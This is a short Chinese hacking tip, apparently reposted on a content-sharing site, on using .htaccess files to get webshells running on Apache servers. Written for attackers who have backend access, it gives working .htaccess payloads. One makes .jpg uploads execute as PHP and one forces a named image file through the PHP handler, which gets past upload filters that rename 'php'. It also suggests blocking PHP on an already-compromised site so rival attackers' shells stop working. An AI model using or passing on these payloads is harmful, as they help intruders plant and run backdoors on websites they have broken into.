打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
.htaccess拿SHELL

.htaccess拿SHELL

经常会有人批量拿shell。特别是upload shell这样的漏洞。

拿下之后最简单的修补方法是,上传一个.

.HTACCESS文件到该木马,先把你的马儿转移到别的目标。

.HTACCESS内容

<FilesMatch “\.(php|php3|php4|php5|php6|php2)”>
 
Deny from all
 
</FilesMatch>

当然这是不完善的,经过我测试,Php即可轻松绕过,你们自行添加吧。

那么别人传的马儿自然无法执行了。

逆向思维一下,当我们拿到一个后台权限,上传PHPshell,可恨的是,他会自动把PHP这个关键词改成PHP-,

加一个横杠,有木有,特别是韩国站比较多见。

如果你运气不是那么背,环境是apache的,并且支持.HTACCESS,那么,恭喜你

上传一个.HTACCESS,内容是

AddType   application/x-httpd-php     .jpg

然后再传一个JPG结尾的shell,访问即可执行了

有点小儿科,刚刚用到,顺手发上来了.

<Files demo.jpg>
ForceType application/x-httpd-php
SetHandler application/x-httpd-php
</Files>

这种只有是指定文件名的文件,才能被当做PHP解析.

本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
让apache解析html里的PHP代码
PHP多版本共存解决方案图解
Apache开启伪静态
.htaccess 与 httpd.conf
上传漏洞总结 | Joy
Hackme: 1: Vulnhub Walkthrough
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服